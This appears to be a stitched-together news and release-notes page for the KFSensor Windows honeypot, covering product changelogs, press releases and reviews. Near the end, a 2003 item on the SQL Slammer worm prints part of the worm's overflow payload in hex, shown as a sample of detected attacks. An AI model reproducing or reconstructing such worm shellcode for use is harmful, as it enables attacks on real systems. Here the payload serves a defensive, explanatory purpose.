Fixes
- Updated to work with the latest npcap 1.7.7.
- Various fixes and updates
Version 5.6.0 contains a number of new and updated scenario definitions.
To protect your existing configuration these are not imported automatically.
In order to update your configuration follow these steps:
KFSensor will dynamically generate a self signed certificate for use by the HTTPS simulated service. It is also possible for the simulated server to use a real certificate that has been added to the local Windows certificate store.
To add this feature to an existing installation, follow the steps below.
The log files can be found using this search pattern.
C:\kfsensor\logs\sensmon_*.log
The log entries start with "Configuration changed:" and provide the date, user name and the configuration setting changed.
Stealth scans cover a range of techniques used by hackers and pen testers to identify hosts, fingerprint OS versions and to determine which ports are open on a host. These techniques involve sending non-standard network packets or non-standard packet sequencing gain a response from a host without establishing a full connection. These are rarely recorded in system log files and can evade detection by certain security products such as firewalls. nmap is the most popular stealth scanning tool.
KFSensor's detection of stealth scans has been improved in the following ways:
The following options are individually identified:
A new user interface panel has been added below the port tree, in the bottom left of the window to display the sensor status information.
Examples of the Sensor Status Information are, how long the sensor has been running for; the list of the host’s IP addresses and the amount of free disk space.
24 more ports have been added to the standard configuration in this release. These have been identified as being popular targets for scanning and exploitation. They include new Trojans and new services increasingly found on networks such as Mongo and Minecraft.
The management of packet data storage has been improved to enable the automatic deletion of old packet data. This ensures that the total packet data stored by KFSensor will not exceed a maximum size and fill up the available disk space.
To enable this functionality; select the Settings -> Network Protocol Analyzer menu and set the Retention Period field to a suitable value, such as 30 or 90 days.
The Sim Server emulation of IIS now supports IIS version 8.
No reconfiguration should be necessary as the default setting is to select the IIS emulation automatically.
KFSensor attempts to identify and ignore UDP traffic that is locally initiated. Certain routers do not always translate the source IP addresses of UDP response packets. This caused KFSensor to wrongly identify these as unknown packets and therefore raise events for them. New algorithms have been added to KFSensor’s packet analyser to identify this situation and reduce the number false positive events generated.
The big change in this release is how KFSensor handles UDP traffic. In previous versions UDP was treated in much the same way as TCP. Both shared the same DOS limit and port scan settings. This worked reasonably well in the past, but the way UDP is being used has changed in recent years. This has resulted in much more UDP traffic being sent across local networks and led to a large number of unnecessary events being logged by KFSensor.
We have made many changes to the way KFSensor handles UDP traffic and the result of this is a big reduction in the number of UDP events generated. Fewer events make it easier to identify the important and unusual events that can indicate attacks on your network.
Recent Trends in UDP usage Continual broadcast: Applications like Dropbox, send out UDP broadcast messages every few seconds as a way of announcing their presence on the local network and discovering other machines running the same application. In the past this behaviour was restricted to DHCP.
Multicast: New Microsoft protocols such as Link-Local Multicast Name Resolution, cause multiple machines to respond by broadcasting UDP packets to the entire sub-net, instead of sending them direct to the requester.
UDP System Improvements
UDP Specific DOS Settings
The DOS Settings dialog has been changed from a single page to a dialog with multiple tabs, one for each protocol. The UDP and TCP protocols now have their own settings and limits. This enables a greater degree of control and allows for differences in the way protocols work to be reflected in how they are handled.
Port specific limits
Each UDP port now has its own limits. This means that when the limit is reached then only traffic on that UDP port will be ignored from a host. For example this means only 3 dropbox broadcasts will be recorded for each machine and this will not affect the recording of any other types of UDP traffic from those machines.
In previous version it was possible to port specific limits for specified ports. In the new version all ports are given their own limit automatically.
Ignore expires
In previous versions a traffic that had triggered an ignore rule would keep that ignore state until the sensor was restarted. Now the ignore status can be set to expire, the default for this is 24 hours.
Better matching of outgoing and incoming UDP
KFSensor is now better at matching UDP traffic received in response to a request sent from the KFSensor host itself. This enables it to ignore such traffic, while still able to generate events for unexpected traffic.
IP fragmentation
KFSensor now handles IP fragmented packets in a better way, stopping the occasional event being mis-recorded because of malformed packets. Better HTML reports
The layout of exported events has been improved, by adding styling to the HTML output.
The File->Export->Event List option not default to HTML as the default output.
If required, the report styling can be configured by editing the C:\kfsensor\conf eportstyle.css configuration file.
KFSensor has always worked on 32-bit versions of Windows. It has also worked on 64-bit Windows, but there were limitations on certain features and there were a few stability problems with the network packet captures module. This meant we did not claim to support 64-bit versions of Windows.
With version 4.9 we have done extensive testing on 64-bit versions and identified and fixed known issues on that environment.
So we now officially support 64-bit versions of the following Windows versions:
The best way for a honeypot to maximize the information on an attack is to give as realistic a service response as possible to an attacker. The ideal is to use the real service, however this has not been practical due to the risks of compromise involved.
In the past KFSensor has attempted to replace every Windows service with a simulated service to allow safe detection of threats. Windows services such as IIS and RPC were notoriously vulnerable to attack, especially on machines connected directly to the public Internet.
Microsoft have made huge improvements to the security of Windows in recent years and a properly patched modern version of Windows is safe enough to use on an internal network, without taking special measures to lock it down. Such machines are still a target for attack though weak passwords on RDP and open file shares are exploited.
KFSensor has long been able to monitor the network traffic of other services and log events in the same way as its own simulated services. This has been improved upon in version 4.9 by enabling KFSensor to monitor the auditing features of Windows itself to get more information on an attack.
This approach enables the use of Windows share folders to be set up and monitored by KFSensor. Extra information, such as the domain user account and windows machine name of an attacker can now be captured as well as the machine?s IP address.
Events logged as a result of information from Windows services are identified by the new ?WIN? protocol, which is used to distinguish them from events derived from the standard networking protocols such as TCP and UDP.
This functionality is enabled by default in KFSensor, but there is extra configuration work required to enable the correct Windows audit settings to be configured. A new section ?Windows Audit configuration? has been added to the manual giving a detailed guide to what needs to be done.
MySQL support
Recent versions of MySQL introduced new reserved words that meant KFSensor was no longer compatible with it. The new version of KFSensor now supports MySQL.
These changes require an existing KFSensor database to be updated, even if it is running on SQL Server.
To perform the database update, after upgrading to version 4.9, go to the Settings -> Log Database? menu and press the Configure button.
This version introduces major enhancements to the way in which KFSensor Enterprise operates. Together these enhancements have been named Full Enterprise Mode.
In the Full Enterprise Mode events from each sensor are inserted into a central database and copies of each sensor's event log files are additionally made on the Administration installation. This is done automatically by a background service on the Administration machine.
The Full Enterprise Mode provides these benefits:Enabling Full Enterprise Mode requires additional but straight forward configuration that is fully described in the KFSensor Administration Guide. This is an optional feature and can be enabled or disabled at ant time. So there is no need to postpone upgrading to the new version.
Vista portsKFSensor is available in three editions; Standard, Professional and Enterprise.
To compare which features are available in each edition view the Compare Edition page.
KFSensor is available in three editions; Standard, Professional and Enterprise.
To compare which features are available in each edition view the Compare Edition page.
KFSensor is now available in three editions; Standard, Professional and Enterprise.
To compare which features are available in each edition view the Compare Edition page.
The April edition of Windows & .NET Magazine features an in-depth lab report on Honeypots for Windows.
This is what they had to say about KFSensor:
"KFSensor appears to be the only virtual honeypot in this review with a clear sense of what it takes to appear to be a Windows host."
"This functionality puts KFSensor in the top echelon of Windows honeypots."
"If you want a feature-packed Windows honeypot that's easy to install and use, KFSensor is the clear choice for you."
Read the lab report on Windows & .NET Magazine's web siteExploiting insecure HTTP proxy and SOCKS servers is now the preferred method used by spammers to relay large quantities of spam, whilst maintaining their own anonymity.
By emulating these insecure servers KFSensor is able to deceive spammers into using its honeypot to attempt to send spam whilst secretly blocking the spam from being relayed to its intended victim.
A typical deployment of KFSensor can block an average of 500,000 spam messages a day and provide valuable information that can identify the true source of the spam it blocks.
For more details click here.
Major New features in version 2.1.4
SOCKS - Sim Std ServerFor Immediate Release
KeyFocus, an Internet security provider, announces the world's first Windows networking emulation honeypot, a key feature of the major new release of its flagship product KFSensor 2.0, its honeypot based intrusion detection system.
This groundbreaking technology enables KFSensor to detect the nature of attacks on file shares and Windows administrative services – currently the most prevalent and damaging of all illicit intrusions performed over the Internet.
Firewalls can detect port scans, but they cannot identify the nature of an. Network Intrusion Detection Systems can identify certain attacks, but not without running the risk of jeopardizing security. Only KFSensor can provide optimal information on an attack, without the risk of compromise.
KFSensor emulates all four of Microsoft’s NetBIOS and SMB/CFIS services, allowing hackers and a whole class of worms – such as Randex and Opaserv, to attempt to exploit insecure file shares and other vulnerabilities in a secure environment. Consequently, KFSensor provides a level of analysis never before available to security professionals.
The already extensive emulation and reporting features of KFSensor have been further extended – adding the capability for users to write their own scripts and database queries. These are compatible with scripts written for the Honeyd system.
About KFSensor
KFSensor is a host based Intrusion Detection System (IDS). It acts as a honeypot to attract and detect hackers by simulating vulnerable system services and trojans.
The system is highly configurable and features detailed logging, analysis of attacks, multiple alerting mechanisms and sophisticated emulations of standard systems services. This approach complements other forms of security and adds another defense against the growing security threat faced by all organizations.
The honeypot approach to security has a number of key advantages. It produces a much lower number of false positive alerts and provides far more detail on an attack than other forms of security.
KFSensor has been developed from the ground up, as a production honeypot system, dedicated to the task of intrusion detection. Used as part of a comprehensive security strategy, KFSensor adds an additional layer of protection to detect security breaches that may not be picked up by other means.
KFSensor is a second generation honeypot application for Windows NT4/2000/XP/2003. Designed to be easy to configure and maintain, it provides advanced honeypot detection to organizations that have chosen not to adopt this emerging security technology up to now.
About KeyFocus
KeyFocus Ltd. is a software company dedicated to developing network and system security software. KeyFocus was one of the first companies to recognize the potential of honeypot technology to move beyond a research tool and become a valuable production system, which could complement and enhance an organization’s existing security infrastructure. KeyFocus Ltd. is a privately funded and based in London, England.
Information Security Magazine have reviewed KFSensor in their October edition.
Read the review at Information Security's web siteFor Immediate Release
KeyFocus, an Internet security provider, launches version 1.4 of KFSensor, its honeypot based intrusion detection system.
KFSensor is a host based Intrusion Detection System (IDS). It acts as a honeypot to attract and detect hackers by simulating vulnerable system services and trojans.
The system is highly configurable and features detailed logging, analysis of attacks, multiple alerting mechanisms and sophisticated emulations of standard systems services. This approach complements other forms of security and adds another defense against the growing security threat faced by all organizations.
The honeypot approach to security has a number of key advantages. It produces a much lower number of false positive alerts and provides far more detail on an attack than other forms of security.
KFSensor has been developed from the ground up, as a production honeypot system, dedicated to the task of intrusion detection. Used as part of a comprehensive security strategy, KFSensor adds an additional layer of protection to detect security breaches that may not be picked up by other means.
KFSensor is a second generation honeypot application for Windows 98/Me/NT4/2000/XP/2003. Designed to be easy to configure and maintain, it provides advanced honeypot detection to organizations that have chosen not to adopt this emerging security technology up to now.
About KeyFocus
Keyfocus Ltd. is a software company dedicated to developing network and system security software. KeyFocus was one of the first companies to recognize the potential of honeypot technology to move beyond a research tool and become a valuable production system, which could complement and enhance an organization’s existing security infrastructure. KeyFocus Ltd. is a privately funded and based in London, England.
A new worm that attacks and exploits a vulnerability in Microsoft's SQL Server rapidly infected thousands of machines after it was launched on the 25 Jan 2003.
The worm spreads by sending a UDP message to port 1434, which causes a buffer overflow. The message is only 376 bytes long.
We are picking up on average of 5 of these attacks an hour.
p>The SQL Slammer Worm payload looks like this: [04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0]B[EB 0E 01 01 01 01 01 01 01]p[AE] B[01]p[AE]B[90 90 90 90 90 90 90 90]h[DC C9 B0]B[B8 01 01 01 01]1[C9 B1 18]P[E2 FD]5[01 01 01 05]P[89 E5] Qh.dllhel32hkernQhounthickChGetTf[B9]llQh32.dhws2_f[B9]etQhsockf[B9]toQhsend[BE 18 10 AE]B[8D]E[D4]P[FF 16] P[8D]E[E0]P[8D]E[F0]P[FF 16]P[BE 10 10 AE]B[8B 1E 8B 03]=U[8B EC]Qt[05 BE 1C 10 AE]B[FF 16 FF D0]1[C9]QQP [81 F1 03 01 04 9B 81 F1 01 01 01 01]Q[8D]E[CC]P[8B]E[C0]P[FF 16]j[11]j[02]j[02 FF D0]P[8D]E[C4]P[8B]E[C0]P [FF 16 89 C6] [DB 81 F3]
About KFSensor
KFSensor is a host based Intrusion Detection System (IDS). It acts as a honey pot to attract and detect hackers by simulating vulnerable system services and trojans. The system is highly configurable and features detailed logging, analysis of attack and security alerts. This approach complements other forms of security and adds another defense against the growing security threat faced by all organizations.